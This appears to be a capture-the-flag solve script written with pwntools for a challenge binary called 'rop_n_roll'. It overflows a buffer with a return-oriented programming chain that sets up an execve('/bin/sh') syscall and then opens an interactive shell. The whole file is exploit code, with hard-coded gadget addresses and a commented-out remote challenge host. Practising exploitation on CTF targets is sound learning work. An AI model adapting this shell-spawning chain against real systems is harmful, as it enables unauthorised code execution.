from pwn import *

context.binary = binary = ELF("./rop_n_roll", checksec = False)
system_address = p64(0x004011ab)
bin_sh = p64(0x00404048)
rdi = p64(0x00000000004013a3)
rsi_r15 = p64(0x00000000004013a1)
null_val = p64(0x0)
rdx = p64(0x000000000040117f)

p = process("./rop_n_roll")
#p = remote("challenge.scy-phy.net", 2013)
#sleep(1)
#gdb.attach(p)

first_input = b"A" * 50
p.send(first_input)
#p.recvline()
#sleep(1)

second_input = b"B" * 469
second_input += rdi
second_input += bin_sh
second_input += rsi_r15
second_input += null_val
second_input += null_val
second_input += rdx
second_input += null_val
second_input += p64(59)
second_input += null_val
second_input += system_address

p.send(second_input)
#sleep(1)
p.interactive()